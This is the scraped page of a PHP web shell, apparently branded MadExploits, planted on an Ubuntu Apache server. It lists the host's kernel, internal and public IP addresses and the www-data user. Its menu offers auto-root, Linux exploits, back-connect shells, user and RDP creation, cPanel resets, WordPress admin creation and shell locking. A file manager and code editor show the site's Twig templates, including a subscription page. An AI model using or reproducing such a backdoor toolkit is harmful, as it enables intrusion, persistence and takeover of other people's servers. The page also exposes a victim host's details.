Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.21.35.63
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amply /
templates /
Default /
[ HOME SHELL ]
Name
Size
Permission
Action
admin.html.twig
5.82
KB
-rw-rw-r--
googleda794cd9937527d01.html
37
B
-rw-r--r--
howto.html.twig
29.48
KB
-rw-rw-r--
index.html.twig
20.12
KB
-rw-rw-r--
index.html.twig.save
9.08
KB
-rw-rw-r--
oldIndex.html
14.92
KB
-rw-rw-r--
subscribe.html.twig
1005
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subscribe.html.twig
{% extends 'base1.html.twig' %} {% block content %} <div class="content"> <div class="card"> <div class="card-header"> <h3>Subscription Details</h3> </div> <div class="card-body"> <table class="table"> <thead> <tr> <th>Subscription</th> <th>End Date</th> <th>Auto-Renew</th> <th>Status</th> </tr> </thead> <tbody> <form action="{{ path('pay') }}" method="POST"> <tr> <td>{{ subscription }}</td> <td>{{ expiry }}</td> <td>On</td> <td> {% if expiry == 'Expired' %} {{ 'Expired' }} <a href="{{ path('pay') }}" class="btn btn-primary">Subscribe</a> {% else %} {{ 'Active' }} {% if subscription == 'Free Trial' %} <a href="{{ path('pay') }}" class="btn btn-primary">Upgrade</a> {% endif %} {% endif %} </td> </tr> </form> </tbody> </table> </div> </div> </div> {% endblock %}
Close